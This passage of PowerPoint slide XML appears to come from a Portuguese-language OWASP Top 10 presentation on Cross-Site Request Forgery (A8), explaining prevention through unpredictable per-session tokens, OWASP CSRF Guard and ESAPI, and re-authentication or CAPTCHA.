              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>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12"/>
              </a:rPr>
              <a:t>CWE Entry 352 on CSRF </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3733800"/>
            <a:ext cx="3383280" cy="26670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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A prevenção de um CSRF geralmente requer a inclusão de um token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imprevisível </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>em cada requisição HTTP. Tais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tokens devem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, no mínimo, ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>únicos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>por sessão de usuário. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opção preferida consiste em incluir um token único em um campo oculto. Isso faz com que o valor seja enviado no corpo da requisição HTTP, evitando-se a sua inserção na URL, que é mais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>propensa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a exposição.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O token único pode ser incluído na própria URL, ou em parâmetros da URL. Contudo, tal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>posicionamento corre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>um risco maior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>já que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a URL será exposta ao atacante, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comprometendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assim o token secreto.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>CSRF Guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do OWASP pode incluir tokens automaticamente em aplicações Java EE, .NET ou PHP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do OWASP disponibiliza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>métodos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>para desenvolvedores utilizarem na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevenção de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exigir que o usuário autentique novamente, ou provar que são realmente um usuário (por exemplo, através de CAPTCHA) também pode proteger contra CSRF.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="15159" y="1014413"/>
            <a:ext cx="6669804" cy="525268"/>
            <a:chOff x="14975" y="1014596"/>
            <a:chExt cx="6670153" cy="525104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="14975" y="1014596"/>
              <a:ext cx="6670153" cy="525104"/>
              <a:chOff x="14975" y="997424"/>
              <a:chExt cx="6670153" cy="525104"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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48" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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49" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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41" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="3"/>
                <a:endCxn id="39" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="4"/>
                <a:endCxn id="44" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
